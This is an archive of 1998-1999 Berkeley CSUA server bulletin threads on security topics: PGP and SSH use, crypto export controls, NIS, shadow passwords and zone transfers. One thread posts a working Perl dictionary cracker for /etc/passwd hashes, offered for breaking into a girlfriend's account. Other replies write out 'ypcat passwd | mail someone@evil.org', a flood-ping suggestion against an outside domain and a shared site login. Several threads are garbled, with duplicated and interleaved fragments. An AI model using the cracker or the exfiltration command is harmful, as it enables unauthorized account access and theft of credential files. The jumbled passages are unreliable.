private-key encryption, and then use RSA to encrypt the key. \_ So how slow is it? Say for a 10KB text email that someone types up, approximately how long does it take? \_ How about a 30GB file? Or a few terrabytes? With the rise in ecommerce and the movement of large amounts of financial data on the net, this is a serious possibility for a large corp. or a government. Could also be plans for that new jet fighter. A marketting campign. Or the Pres. ordering a hit on a foreign national. Smaller delays are always a good thing if the cost is zero. \_ If it's even only "as good as" existing methods, it would be a great thing, seeing as how 1. It is OUTSIDE the US 2. it is not patent or copyright protected. \_ My impression was that her "method" was just a speeedup to RSA, which would mean that you still have to pay RSA to use it. \_ I read some pseudo tech stuff from the MIT guys she worked for and ripped off the core ideas from. It isn't RSA. \_ Can you give a URL, please? |
1999/1/13 [Computer/SW/Security] UID:15221 Activity:nil |
1/12 Can someone point out the URL to download SSH server? Thanks. \_ http://www.yahoo.com \_ www.ssh.fi -nolram |
1999/1/12 [Computer/SW/Security] UID:15212 Activity:high |
1/11 Anybody know of environmental organizations that needs volunteers to plant trees year round, and not just on arbor day? I want to volunteer for such an organization. Any web site or other pointer would be greatly appreciated. \_ <DEAD>www.treehuggers.org<DEAD> \_ <DEAD>www.treehugginghippies.com<DEAD> \_ Friends of the Urban Forest do it here in SF: http://www.fuf.net -ausman \_ there's going to be an International Volunteer Conference on Feb 6,7 Im sure they'd have info on tree volunteer stuff. --sly From: Cal Corps Public Service Center <ccorps@uclink4.berkeley.edu> Community Service Around the World Conference and Expo February 6 & 7, 1999 Register early or at the door on February 6th. To preregister, email conference@lafetra.org and request registration information. EVENT LOCATION MLK Student Union Building, corner of Bancroft and Telegraph on the UC Berkeley Campus URL: http://uga.berkeley.edu/calcorps \_ Thank you all for the pointers! |
1999/1/7-10 [Computer/SW/Security] UID:15183 Activity:high |
1/6 Is there a mail program on a unix machine (say, soda) that uses pgp automatically when you read a mail in a mailbox file. \_ the latest versions of elm do \_ How? Can't find mention of pgp in man elm. \_ Why, do you fear the power of root cow? \_ modify the sending-filters entry under pine. \_ the latest versions of elm do \_ You could easily write a program to watch your mail file for changes, and encrypt it to a new file when it does change. In fact you could just hack up biff to do it! \_ My hacking fu is not strong. Is there a way to use pgp within pine? I just want to do pgp message wise like \_ My hacking fu is not weak. Is there a way to use pgp And if you are root, then just hack your incoming mail program, not that hard. \_ My hacking fu is weak. Is there a way to use pgp within pine? I just want to do pgp message-wise like some MIME encoding. BTW, what does pgpdecode and pgpencrypt do? Can't man them. \_ sigh. do this: "pgp -kg" "elm" The rest is self-documenting. Oops. After you set your o)ptions to be an intermediate instead of beginning user in elm, that is. \_ What is up w/ PGP for UNIX anyway. How come for Windows & Mac, you can get PGP6, w/ 4096-bit keys, but UNIX world continues to plod along w/ 2.6.2 w/1024-bit keys. http://www.pgpi.com for latest versions. \_ you lose \_ I think the only difference is the key generator. Just use the inferior OS version to generate your 4096 bit key but use pgpi to actually send and receive. \_ mutt has much better pgp support than elm. -tom \_ but i like elm better \_ you lose the popularity contest, but win a better mailreader |
1999/1/6-7 [Computer/Networking, Computer/SW/Security, Computer/SW/Unix] UID:15181 Activity:nil |
1/6 Let's say I do a "netstat -a" and see someone is hogging up a port that I need (ie. I'm running a MUD server). As a root, how do I delete the process that is associated with that port? Thanks. \_ use lsof to get the pid of the process that is using the port. |
1999/1/6 [Computer/SW/Security] UID:15180 Activity:nil |
1/6 Oh, I'll be darned. Say hello to Tawei Liao: % netstat -a | grep tawei f4b47800 stream 0 f48ee680 0 /tmp/ssh-tawei/agent-socket-8677 |
1999/1/6 [Computer/SW/Security, Academia/StanfUrd] UID:15177 Activity:nil |
1/5 From http://www.finjan.com/wsj2.cfm about the Excel security hole: "We think this is probably the biggest security hole in Internet history," said Bill Lyons, Finjan's chief executive officer. "Any student at Stanford could exploit it." Yup! Only M$ is dumb enough to have created such a huge security hole that even Stanfurd students can exploit it. :-) |
1998/12/30-31 [Computer/SW/Security] UID:15146 Activity:kinda low |
12/28 Help crack DES again. http:/http://www.distributed.net \_ oh boy how exciting. Get a fucking life. \_ If you don't like tech projects, don't read the soda motd. \_ Crunching random numbers over and over again is not a tech project. -tom \_ You tell 'em Tom! Crush their will, destroy their ego! You, truly, are the only one who knows anything! Lend us a tiny fleck of your vast wisdom! \_ Although I think the DES cracking project is ridiculous, I don't see anything wrong with others participating. It isn't as if these people are sitting there putting in real effort instead of having lives. They just run the client and hope to get lucky and see their name in lights. What's wrong with that? \_ Plus, hopefully the government will realize the futility of their cryptography export restrictions when DES is cracked in a short enough time (its down to 2 days). \_ Highly doubtful. The previous cracking attempts merely resulted in the US govt. convincing most of Europe & Asia to join in the encryption export stupidity, to make it harder for us to import software. (Besides, most congressmen wouldn't know a DES crack from the giant holes in their heads.) \_ It hasn't started yet, it was just announced. It starts in January. \_ Sillyness about http syntax deleted. It was too silly even for the motd. |
1998/12/4-6 [Computer/SW/Security] UID:15065 Activity:high |
12/3 The Wassenaar agreement has been signed; approximately speaking, it is a treaty which will require other countries to impose US-style export controls on cryptography. http://www.wassenaar.org \_ Damn Republicans. They had to start this whole anti- cryptography crap. I can't believe Clinton actually supports them too. \_ Going back to the clipper chip this was always a big Clinton issue. \_ It's so ironic that the US is the only democratic government in the world that is so paranoid about public use of public key cryptography. \_ It's for your protection. \_ If owning a public key is criminal, only criminals will own a public key. \_ Outlaw public key crytography. Great, now no one can use pgp and ssh and people who do 'require' ssh and ssl (like sysadmins) can't use them anymore. And yes there are a lot of non-government systems that do require encryption. Speaking of protection, do you think if you outlaw pub key crytography that criminals or terrorists won't try to get there hands on it. Now you've just outlawed legitimate use of the technology and let criminals use it. Read up on it more and you'll see why outlawing it is such a bad idea. /ftp/pub/cypherpunks \_ I think you are responding to a joke. \_ Yes, it was a joke. Too bad some people just don't get it. Lighten up folks. \_ ah yes, that was just so hillarious i forgot to laugh. \_ No, you're just a friggin' idiot with no sense of humor and lacking the slightest shred of what might pass for intelligence at the dismal pit Berkeley has become at the undergraduate level. \_ tom, is that you again? What did I tell about judging other people's sense of humor \_ If I was a criminal and I really wanted strong encryption why couldn't I just code up the RSA public key cryptography algorithm? Granted it might take a little while but my point is that anyone who wants strong cryptography can write it themselves. Do the anti-crypto people have an argument against this? \_ It's not as easy as it seems to code these algorithms. There's on cryptography. Nevertheless, he studied in enough all kinds of attacks that don't necessarily involve breaking the underlying math. It's definitely possible, but I think that it's only feasable for criminals who can hire people with the appropriate fu. - mikeym \_ Actually, it is as easy as it seems. The original creator of PGP was Phil Zimmerman who himself was not an expert on cryptography. Nevertheless, he studied it in enough and consulted enough people about any loopholes in his program that he finally came up with a product that is now widely used. All from a joe schmo who graduated from U.Florida with a B.S. in computer science. \_ I don't think that PGP has the NSA quaking in its boots. \_ But the threat of public key cryptography comes not from individual terrorists (I don't think Timothy McVeigh used pgp) but from other countries and their military, which are competent enough to implement a robust cryptographic system if they wanted to without the help can keep recompiling and changing the key size of anyone in the US. Which is why banning public key cryptography is pointless. \_ Yes, this is true, but my point was that it requires more than the common criminal can do. Not just "anyone" can do it. I would even guess that many governments would have trouble outsmarting the NSA. - mikeym \_ The "common" criminal is a purse snatcher or car jacker. It's likely the only computer they ever owned was the one stolen from your apartment. \_ Read what I was replying to: "anyone who wants strong cryptography can write it themselves." This is FALSE. It requires a lot of knowledge and intelligence. That was my WHOLE point. - mikeym \_ You didn't have a point. \_ Any moron can download and compile the int'l version of PGP. And of course they can keep recompiling and increasing the key size (for use amongst themselves) forever. \_ PGP is the height of security? \_ It's "pretty good", no more, no less. \_ So it is not a technical problem but a money one? -jon |
1998/11/23-1999/2/2 [Computer/SW/Security] UID:15002 Activity:nil 58%like:14964 |
11/15 Learn to use ssh -- read "/csua/adm/doc/ssh-howto". -brg |
1998/11/19 [Recreation/Computer/Games, Computer/SW/Security] UID:14981 Activity:nil |
11/19 http://www.gamecenter.com/Reviews/Item/0,6,0-2289,00.html?st.gc.fd.gca \_ Oh. My. God. |
1998/11/15-23 [Computer/SW/Security] UID:14964 Activity:nil 58%like:15002 |
11/15 Dealing with people who get their passwords sniffed is a waste of the CSUA's time. Learn to use ssh -- read "/csua/adm/doc/ssh-howto". -brg |
1998/11/14-16 [Computer/SW/Security, Computer/SW/Unix] UID:14955 Activity:nil |
11/13 What's up with the following? just a routine passwd change... http://soda.CSUA.Berkeley.EDU% passwd Error: /dev/d0f3 Failure level 2 \_ This means they just posted your password & login to the net. |
1998/11/14-16 [Computer/SW/Security] UID:14954 Activity:moderate |
11/13 I have a text file that I want to have a leggaly admissible time stamp. This should be easy with some type of public key. Is there a service like that? \_ I don't think there exist any such electronic notary service. If the recipient trusts you then you yourself can put a time stamp on the text file and then you can use pgps to sign it. Therefore your recipient knows that there's only one person that can medle arount with the time stamp. \_ There is no specific recipient --- it's not an email message. I just need to prove that I created it on some specific day. \_ print it out and take it to a notary. \_ Is there no electronic/"hi tech" way to do it? \_ case law too new, risky to do it high tech unless you are Novell/MS/etc. and have $ lawyers - do it old-fashioned way |
1998/11/13-16 [Computer/SW/Security] UID:14952 Activity:nil |
11/13 How do people deal with pgp under multiple accounts? Do they simply recreate a new key all together or do they use the same one? Also, if you change things like your email address or passphrase do you have to redistribute your public key all over again or can your corresponents use the same key. thx. --pgp hozer \_ Is that you, mark? |
1998/11/13-16 [Academia/Berkeley/Classes, Computer/SW/Security] UID:14950 Activity:nil |
11/12 Wow, further proof that our dorms aren't as bad as we thought: http://www.nytimes.com/library/tech/98/11/circuits/articles/12prin.html \_ Unit 2 Cunningham has had this since '92. \_ got a username/passwd for us to use? \_ cypherpunk/cypherpunk \_ just create one for yourself \_ It's free. Try this: http://verify.nytimes.com/subscribe/sub-bin/new_sub.cgi \_ What's that sound? Is that the sound of freedom being chipped away, bit by bit? What's that? It's for my safety? Gee, thanks. \_ Anyone know the detection range for our prox cards? Is it the ~3 cm you have to get to the readers to get them to unlock the door, or could they be read from a longer distance in theory? |
1998/11/3-4 [Computer/SW/Security] UID:14887 Activity:high |
11/3 Is the latest ssh bug really worth deinstalling it? My friend and I are having an arguement over this point. A URL on the subject: http://news.freshmeat.net/readmore?f=ssh-vulnerability --ssh h0zer \_ No definetly exploitable vulnerability has been found yet Until one is, you're much better off using it than not \_ Your machine is safer with no login mechanisms, not even ssh. In fact, its even more secure if you unplug it from the net, unplug it from power, lock it in a safe, and bury \_ Your machine is safer with no login mechanisms, not eve \_ But even then your host can still be easily compromised through the use of brute-force methods. If you're really concerned, the best solution is to not buy a computer at ssh. In fact, its even more secure if you unplug it fro the net, unplug it from power, lock it in a safe, and bur that safe beneath your home \_ but then I miss out on all the cash I get from \_ But even then your host can still be easily compromise \_ IBM has specially denied the assertion that it had ever uncovered an exploitable bug in ssh, and is complaining about rootshell's unethical use of a minor advisory which does not appear to detail any real security threat. So the through the use of brute-force methods. If you're reall concerned, the best solution is to not buy a computer a all. Go outside and enjoy the blue sky and sunshine - you'll have all that extra pocket cash to take with you \_ fresh air smells funny. i think i'll stay inside soda \_ but then I miss out on all the cash I get fro cracking other peoples' ssh-guarded firewalls \_ IBM has specially denied the assertion that it had eve uncovered an exploitable bug in ssh, and is complainin about rootshell's unethical use of a minor advisory whic does not appear to detail any real security threat. So th people who supposedly found the bug say there is none |
1998/11/2-3 [Computer/SW/Security] UID:14876 Activity:kinda low |
11/2 IMAP service (finally) available on UCLink4. See: http://weblink.berkeley.edu:8000/imap.html for details. \_ It's been there for a while, but they only just announced it. Has anybody tried it? |
1998/10/13-15 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:14769 Activity:low |
10/12 Is there a web site for the Spanish channel Ch14? Thanks. \_ http://www.univision.com \_ But that's a company called VisiCom which makes video hardware. |
1998/10/12-14 [Computer/SW/Security, Computer/SW/Unix] UID:14767 Activity:kinda low |
10/12 Is is true that if a user account is comprmised on a network of computers running NIS, the entire network of computers running NIS are compromised? \_ It will allow people to "ypcat passwd | mail someone@evil.org", which should be considered a problem. This is probably what whoever said that was thinking of. \-well, that isnt really enough info to make any guesses but my guess would be "if the user can log into one NIS client, the login in probably valid on other clients which would need to be checked out". the more involved question is "if someome breaks root on a NIS client, what are the implications for the whole domain". --psb \_ Not "enough info to make any guesses"? The quality of users' password choices has not gotten any better over time, and Crack still works (even better, now that computers are faster). \-i mean the poster hasnt provided enough info for an answer ... we cant really guess what the question means. --psb |
1998/10/8-11 [Computer/SW/Security] UID:14752 Activity:kinda low |
10/7 I want to use a console based ssh on my NT machine (i.e. so that I can run ssh in a MSDOS shell). I have found 1 program but that didn't have vt100 support. Any pointers? (Why do I want to do this? Because I want to use econsole and not the ugly FSecure ssh terminal). \_ set up a port forward for port 23 and use whatever telnet client you like. -tom \_ But then is there a console based telnet for NT? The standard telnet will pop up another window. \_ SecureCRT baby, worth every penny. http://www.vandyke.com \_ Or teraterm, also worth every penny but much cheaper. http://www.zip.com.au/~roca/ttssh.html \_ Teraterm is better than FSecure or SecureCRT, IMHO. Suggested changes: turn off cursor blinking in the .ini file (it's not one of the GUI configurable options), and steal the font from CRT/SecureCRT as it's the one xterms use and looks much nicer than your default options. Also turn off the menu.. hey.. you don't really need it --dbushong \_ But can teraterm have transparent backgrounds like econsole? \_ Now seems as good a time as any to ask why the fuck you're running windows.. --dbushong \_ It has source. there fore, if you have clue and time, it can have that. \_ Anyone know of any Mac SSH software besides F-Secure? \_ NiftyTelnet SSH. \_ URL? --dim \_ http://www.lysator.liu.se/~jonasw/freeware.html Note that it's technically illegal for use in the US of A. I'm distribution of th SSH-enabled beta is on hold: actually looking forward to the SSH enabled version of BetterTelnet, which is a really nice Mac telnet client, but distribution of the SSH-enabled beta is on hold: http://www.cstone.net/~rbraun/mac/telnet/beta/ssh.html |
1998/10/3-5 [Computer/SW/Security] UID:14728 Activity:nil |
10/3 Has anyone bought stuff from InDirect? They seem to have really cheap prices. How about Hi-Tech USA? I don't really give crap about customer service. I know exactly what I want already. \_ if you don't care about service then why are you asking? |
1998/9/24-26 [Computer/SW/Security] UID:14665 Activity:high |
9/24 How do I find out what machines are in a certain domain, e.g. http://laney.edu? Thanks. \_ ping -f http://laney.edu \_ a little command many people forget about: host -l http://laney.edu \_ echo "What machines are in your domain?" | mail postmaster@laney.edu \-You have to be so tall ... /tmp/laney.edu --psb You could try to use nslookup's ls command to list everything in the domain, but most nameservers (including http://laney.edu's) won't let you. \-"You have to be this tall ... " ... /tmp/laney.edu --psb \_ you could get a map of what network addresses they use, and then try to get reverse dns mappings for everything in those addresses. This is why disabling zone transfers on a nameserver (i.e. ls) is pretty stupid unless you kill reverse dns too. -ERic \_ Disabling zone transfers stops the script kiddies for now (until someone takes pity on them and writes them a script to do things the hard way) \_ so until then you end up making it harder on everyone else. \_ stupidity in the name of security is rampant. See soda's relaying policy. -tom \_ most everyone else doesn't need to do a zone xfer or can ask nicely for one \_ Disallowing them is a security through obscurity policy, and impedes curiosity. It's like turning off finger on Unix. Besides, crackers can still scan easily, even without using DNS. \_ or it's like using shadowed passwords \_ WTF are you smoking!? Non shadow-passwd files are a huge security hole. Give any user on your system instant access to all the poor sops' accounts and files who can't pick a decent password. \_ unshadowed passwrds aren't the cause of the security hole, stupid users are \_ shadowed passwords provide little real security; it's not difficult to get the shadow file without root. -tom \_ Um, by that logic, it's not hard to get root, so why bother having any security at all --dbushong \_ Tom, you were the one who suggested using shadowed passwds and have, until now, continued to do so on the basis that it was "more secure" for at least 4 years now, see CSUA/OCF/XCF Help Session handout by Tom Holub \_ I haven't updated that in quite some time; I haven't taught the security help session in something like 3 years. At the time, I wasn't aware that programs such as ftpd can leave large swaths of the shadow file in core dumps. -tom \_ That's not the logic. The logic is that shadowed passwords provide a false sense of security. The security problem with non-shadowed passwords is having bad passwords; having shadowed passwords does little or nothing to alleviate the only problem it could theoretically solve. -tom \-i think turning off zone xfers is basically free to do. of course you shouldnt rely on it and what is really the important thing to do is to be able to see who is asking forone and what they do right after that. a zone xfer a pretty good indicator of certain types of scans/signatures of certain tools. --psb \_ Or just curious network users. E.g. zone transfer of various things under http://mit.edu is fun. \_ Please define "zone transfer" -- clueless \_ Simple answer: it's what you get when you run host -l or nslookup ls. Long answer: Read the BIND book from O'Reilley |
1998/9/23-24 [Computer/SW/Security] UID:14655 Activity:high |
9/22 Any chance of getting ssh2 installed? not clobber ssh1, but just have ssh2 available so that we might be able to access other systems, pretty please? I'll do it if you gimme the root passwd! \_ You don't need to be root. Just compile it in your home directory and delete the source tree once you'r done. The README tells you how to do it. Or better, put it in some shared directory so everyone has access to it. The only bummer is that you can't get the daemon to work without being root. \_ What's the diff? \_ ssh2 uses the ssh 2.0 protocol which is more secure some ssh2 servers won't accept ssh1 connections \_ does that mean that they won't accept telnet/rlogin sessions since those are less secure. An ssh2.0 only server - that's unheard of. Stop tabbing so \_ It's what you get if you install sshd2 and don't set it up to call sshd1 to handle old connections. The sshd2 software only knows how to handle ssh 2.0 protocol. far to the right. \_ It's not unheard of and it makes great sense. --dim \_ Some cs servers (like torus.cs) only accept ssh & kerberos connections - no normal telnet/rlogin \_ This is a good policy and should be expanded (at least when there are more free implementations of SSH). \_ originally, there was a problem with the ssh2 licensing that made it okay (without paying for licensing) to say have sshd running on a machine if say people were going to login and use the machine for homework but not necessarily so for machines like restricted access fileservers and nameservers that only administrative people needed (or could) log into. This may have changed since ssh2 was first released. --jon \_ It's still quite far from a free software license. See /tmp/SSH-LICENSE, if you want all the gory details; there is a project to create a genuinely free replacement. -- schoen |
1998/9/22-23 [Computer/SW/Security, Computer/SW/OS/FreeBSD, Computer/SW/Unix] UID:14648 Activity:high |
9/22 look what i wrote. have fun cracking your wanabee gf's password! \_ and getting kicked off of soda \_ This assumes that you have a user readable passwd file. \_ or non-shadowed passwd, like soda's \_ /etc/passwd must be world readable, so the #!/usr/bin/perl $twink = $ARGV[0]; open(PASSWD,"/etc/passwd"); do { $line = <PASSWD>; ($user,$passwd) = split(/:/,$line); } while ($twink ne $user); close(PASSWD); $salt = substr($passwd,0,2); $passwd = substr($passwd,2,); foreach $attempt (`cat /usr/dict/words`) { chop($attempt); if($salt.$passwd eq crypt($attempt,$salt)) { print "password is: $attempt\n"; exit(1); } } print "Unable to crack password\n"; "user readable passwd" implies non shadowed \_ soda has a shadowed passwd file. all 4.4 bsd derivatives have such a mechanism. most modern unix like os's do. only older's like ultrix, older irix, <= 4.3 bsd derivs \_ even ultrix has shadowed passwds \_ I am not sure if I would call that monstrosity a passwd file, but okayn in that case, I amend my earlier statement to include ultrix and sunos as shadowable --jon \_where does soda keep its shadow passwd's? \_ where no one but the people with enough clue to RTFM can find them \_ Alec Muffett >> you \_ /usr/dict/words is a lame dictionary - real crackers use much much larger dictionaries \_ Real crackers kidnap the person, tie him/her up, and beat the shit out of him/her until (s)he gives you the password \_ REAL crackers get root shell... \_ True crackers don't bother with gf's account. They sift through her lingerie drawer for a diary (amongst other items...) \_ CSUA crackers sift through her lingerie drawer and wear it. \_ Free Kevin Mitnick! |
1998/9/4-5 [Computer/SW/Security] UID:14546 Activity:nil |
9/4 I'm going to school at MIT now and they make you pay to connect to the campus network. Does Berkeley still provide free access? Also can anyone suggest some good ISPs in the Cambridge/Boston area? Thanks. -emin \_ berkeley's is 642-9600. you need to get an account first at http://www-uclink.berkeley.edu (they combined the forms for homeip and email) or you could try to telnet to <DEAD>hip.berkeley.edu<DEAD>. |
1998/9/3-7 [Computer/SW/Security] UID:14538 Activity:nil |
9/3 I remember on UCTwink, when I logged in, it would tell me how many previous unsuccessful login attempts, if any, there were. Is there anything similar on CSUA? \_ Nope, though they could simulate it using the system logs, or by patching login. But you should be using SSH... -- SSH h0zer |
1998/8/26-27 [Computer/SW/Security] UID:14518 Activity:moderate |
8/26 ssh 2 now released -jon (usu place, usu way) -jon \_ Damnit, i just finished installing the old one on my computer. you should have told me sooner. \_ local mirror? And what new features/security holes doe sit have that we should be upgrading it to for? \_ I had trouble getting to the ftp site since net to finland is a little slow. It implements the ssh2 protocol which is on the IETF standards track. read comp.security.ssh for more info --jon \_ I'm sure. So is there a local copy here you're willing to share? \_ You want to upgrade your client so you can talk to new ssh2 servers, but don't want to upgrade your servers until everyone has the new client as they don't play nicely with older clients. \_ ssh 2 server can serve ssh 1 clients, sort of. You keep sshd1 around, and ssh 2 can call it, if it's configured to. --PeterM |
1998/8/26 [Computer/SW/Security, Computer/SW/Unix] UID:14511 Activity:high |
8/26 "I have a problem with extracting from a .tar file. When I archived it, \_ Use gnu tar. \_ you should finish your question. tar xvf foo.tar to extract files tar cvf foo.tar foo to archive directory foo into foo.tar tar xzvf and czvf will handle tar.gz files. \_ I would have finished my sentence, but \_ I think the best bet is if you \_ Yeah but that won't work becau" \_ Let me complete the part of the question that was deleted by someone. I unthoughtfully archived from the root directory using "tar", but now I am under a different directory system and I am not root. So I have trouble extracting from the archived file. Could anyone please suggest a solution? Thanks! \_ give more details (do you have root access on this new machine? what error msgs are you getting? why are you trying to archive starting at the root directory and untaring it to another machine. From the info you put above no one can help you and will only make fun of you like the cock sucker below. \_ You don't have to be root to untar the damn file. untar it somewhere else. Wanting to write to the root directory w/o root access is NOT a tar question. But it makes sense that you don't have root access. People w/o a clue shouldn't have root access. \_ He's asking how to untar it somewhere else, you idiot. \_ No, you moron. He meant root directory on a different system. |
1998/8/26-27 [Computer/SW/Security] UID:14510 Activity:kinda low |
8/26 How do you get fetchmailrc to retrieve mail from uclink4 using ssh? \_ how's about "ssh uclink4 -L 9660:uclink4:110 -f" then have fetchmail POP to port 9660. -nick \_ You're tool cool. \_ If you don't do "-L 9660:localhost:110" then you're traffic will still go out on the local uclink4 network unencrypted. -randal |
1998/8/23-25 [Computer/SW/Languages/C_Cplusplus, Computer/SW/Security] UID:14498 Activity:nil |
8/22 The Commission on Campus Computing report is now public. You can see it at http://ls.berkeley.edu/coc/report.html. Salient points (these are all recommendations--they have not been and may not be approved by the Chancellors): * Computer ownership should be required for new students starting in 2000. \_ not everyone can afford a computer. \_ This is becoming less and less true. (Read the report.) \_ If a computer is made a requirement, students can make it part of their financial aid package. -tom * Network connections should include a monthly charge starting in 1999. * All courses should have at least a skeletal web page. * All students should have a single account which includes disk space and Web access and which stays with them for the duration of their time at Cal. * IS&T should be moved under Carol Christ, and a new head of "Educational Technology" should be created. -tom |
1998/8/21-22 [Computer/SW/Security] UID:14493 Activity:very high |
8/21 My supervisor asked that everyone in the office release their e-mail password to her. I don't feel comfortable doing that, and was wondering if there is some sort of UCB e-mail policy about not releasing passwords that I can quote in response to her request. \_ Your boss has no right to require that you give them your password. root has the right to have full access to your account but that's a different story. Don't do it. Tell him shoove it up his ass if he forces you to. \_ root has the ability, but not necessarily the right, to full access to your account. (If at a UC or ISP, root is prohibited from reading your e-mail for instance.) \_ Just say "NO WAY IN HELL" \_ You are F..I..R..E..D!!!! (do I smell million dallar law suit?) \_ Is it your personal email account or work account? Either one, you have to right to not to. You should ask her her reason for knowing password. \_ It is my csua account which I also use for work. What I am looking for is some sort of csua or ucop rule that says I am not obligated to give her my password. \_ CSUA policy forbids you from allowing anyone else to have your password or use your account. If she wants a password to your work e-mail, make her give you a work e-mail account. --root \_ in fact CSUA root will turn your account off should we find that this is the case. --jon \_ Employers have a legal right to access to your office workstation and business related accounts. That does not extend outside the office. Forward your mail outside and tell her to shove it. If they forbid you from forwarding your mail outside the company, be very careful what email you do with your business address. BIG UC Policies. --jon BOSS is WAtching YOU. -ERic \_ But the UC/UCB e-mail policy protects the privacy of UC employee e-mail - see http://socrates.berkeley.edu:7015/policy \_ Your *e-mail* is protected, but your *password* is not. In fact there is a campus policy that your supervisor *must* have all the passwords you use for business purposes (if you're UC staff). They just can't look at it except under the situations outlined in the e-mail and other policies. -tom \_ No, root never knows what your passwords are. Having passwords stored anywhere on a computer comprimises security. Passwords on /etc/passwd or /etc/shadow are one way encrypted so there's no way to derive the original passwords without a password cracker and a high performance computer. \_ A 386 is powerful enough to crack many passwords. \_ I didn't say root, I said "your supervisor". -tom \_ Boy imagine that, UC managers who do not understand or are not aware of UC Policies. --jon btw, if you want a wider discussion, there is also http://ucb.net.discussion. I am sure some of the more security minded denizens of that newsgroup will have some interesting opinions on this topic. \_ Well its nie the the UC at least grants some expectation of privacy to employee email. I'm just pointing out that in the 'real world' of employment, it can be very different. -ERic \_ I think she likes you! \_ I think so too!! \_ She's married and I'm a girl. Hence, I don't think so. \_ She could be bisexual. \_ How about giving me your password. I am not married and I am a guy and not gay. \_ which company is this? |
1998/7/30 [Computer/SW/Unix, Computer/SW/Security] UID:14416 Activity:very high |
7/30 Where the heck is kchang? I need my daily dose of idiocy. \_ WHITEY GO HOME \_ Oh my god, they killed kchang! You bastards root! \_ Is that what /csua/adm/bin/sorry means? \_ Yes...I killed him cuz I was on his watch list. My accomplice helped me cuz he was not on his watch list. \_ Sorrying kchang is morally equivalent to slavery and discrimination against the black man! Just because you lily-white root bastards no longer keep black people in chains and let millions of mexicans across the border every day, you think "nobody can see us discriminating in all these other ways in which we used to discriminate . . . so its okay to sorry kchang because were are being so good and nobody will notice!!!!!!!" You are wrong!!!!! I WILL NOTICE!!!!!! \_ I didn't write this; I don't endulge myself in the gratuitous use of exclamation points -(fucker) \_ In this context, the use of additional exclamation points is quite correct. It emphasizes the mental anguish and suffering of an AGGRIEVED MINORITY!!!!!! WHITEY (root) WILL PAY!!! \_ kchang left soda to devote his full attentions to a career in the bath-house management industry. \_ i.e. he went to take a shower? \_ you guys are too sarcastic. |
1998/7/29 [Computer/SW/Security] UID:14409 Activity:nil |
7/27 Does anyone know why there are two different versions of pgp on instructional machines? There seems to be the version where everything is done through the single pgp command and the other version that's split up into pgps, pgpe, pgpk, etc.. \_ PGP 2.6 (as well as 2.3) == pgp PGP 5 == pgps, pgpe, pgpk \_ where do you get this pgp 5? I thought csua's ftp site was supposed to contain the most up-to-date version but they only seem to go up to 2.6 (/ftp/pub/cypherpunks/pgp/) \_ it's commercialwarez \_ source is still available although many people think PGP is selling out. Get it from http://www.pgpi.org worldwide, e.g. cypherpunks FTP is NOT maintained now. \_ SWW on the HP's & DEC's is run by the dept. and is stagnant due to lack of employees to maintain it. SWW on the Solaris x86 machines is maintained by root@cory and is much more up to date (making it wildly inconsistent with the other machines). \_ Ahh, but I am pushing the sww people to get there stuff more current. First on the plate is emacs then a bunch of the gnu utilities. --marc \_ Good luck! There simply aren't enough people and PGP sure as hell isn't a high priority. Push all you like. Into /dev/null. Don't waste your time trying to get SWW to do anything, just build your own. -been there, done that |
1998/7/27-29 [Computer/SW/Security, Computer/SW/Unix] UID:14400 Activity:high |
7/27 One of the instructional computers was found cracked and was possibly running a sniffer. Since the machine in question was on the 43 net, soda accounts might have been compr[o]mised. \_ are there political problems w/ turning off rsh telnet and so on (in favor of ssh) \_ Is that a pretty elitist point of view? Maybe we should just leave rsh/telnet enabled, but force them to use a one-time-use password scheme. \_ lots of people don't access to ssh. \_ lots of people don't [have] access to ssh. \_ SSH does not work well with some corporate firewalls \_ A more 3l33t plan would be to unplug soda's net connection, and have all interaction with the machine be via hardwired TVI 920 terminals. All the terminals would be in the same room as soda (to make sure that hackurs from the outside don't splice their way into the wiring), and that room would be TEMPEST shielded. \_ and what would we use soda for it it had no net connection? \_ Don't use telnet. Don't use telnet. Don't use telnet. (I have said it thrice; what I tell you three times is true.) \_...or ftp, or pop3... \_ Kerberized telnet? telnet -x otherhost \_ not to soda \_ sometimes we have to connect to soda from devices that don't support anything BUT telnet. Like routers and access servers. We need one-time-passwords on telnetd. -ERic \_ but was the snark a boojum? \_ The snark WAS a boojum, you see. \_ If your firewall is lame-ass (i.e. run by BBN because some marketroid thought it would be a good idea) and you are forced to use telnet, do what you can to set up one-time passwords via s/key. There is a free WinBlows one-time password computer available out there (I got my copy from somewhere on <DEAD>ftp.msri.org<DEAD>) and if you want to port it to another UNIX then we have source here on soda. Doesn't solve all problems, but at least prevents scriptkiddies from grabbing your real password. rtfm on skey(1) for more info. -- tmonroe \_ Might want to check out OPIE instead of S/Key. --dim \_ urlP \_ ftp://ftp.nrl.navy.mil/pub/security/opie or ftp://ftp.inner.net/pub/opie --dim \_ One-time passwords are somewhat limited compared to SSH, though, since they don't typically encrypt the contents of your session (thus preventing you from safely typing other passwords from within telnet). Better than nothing, though. \_ The point was not everyone can use ssh. \_ ssh is also much better than telnet for dealing with flaky connections that drop a lot of packets for extended periods of time, if you don't want to lose link. For some reason. Can someone explain this? I'm curious. -John \_ TCP_KEEPALIVES-- telnet uses them, ssh doesn't. odd that the SO_KEEPALIVE would cause to lose connections in a lossy network, but thats how it works. -ERic \_ Since the 43-net runs through public access labs that anyone can bring their laptop into and start sniffing, always assume packets to soda are being sniffed. \_ Why isn't access at the public access labs run on switches? Is there a reason to expose the communications "backbone"? \_ What's the notation for "current PID" in most shells and Perl? There's your answer. \_ Geek. Just say $$. Sheesh. Had to be "clever"? \_ Switches cost money - the dept's just barely finishing converting Cory Hall - Soda Hall is scheduled to be converted as soon as they figure out who's paying for it. \_ the cost difference between switched and shared is negligible these days. -tom \_ But they already have shared and already paid. Also, maybe they want to wait for Fast Ethernet? \_ Because the university by its nature is always behind. |
1998/7/25-26 [Computer/SW/Security, Computer/SW/Unix] UID:14393 Activity:nil |
7/24 What is the best way to do encrypted FTP? I'd like to do the data stream, but I'd settle for the command channel. Anonymous FTP would be nice, too. SSL is the only method I've investigated. Ideas? --dim \_ SSH port forwarding for this is pretty standard; you might need to use passive FTP. Datafellows is also coming out with an FTP client with built-in SSH soon, they say. If you don't need interactive capability, SCP is far better. -- schoen \_ Already using SCP, but have need for FTP. Port forwarding as described in the SSH FAQ is not an option. I need a more transparent solution. Thanks. --dim /- Whoa, news from the future! |
1998/7/14 [Computer/SW/Security] UID:14328 Activity:high |
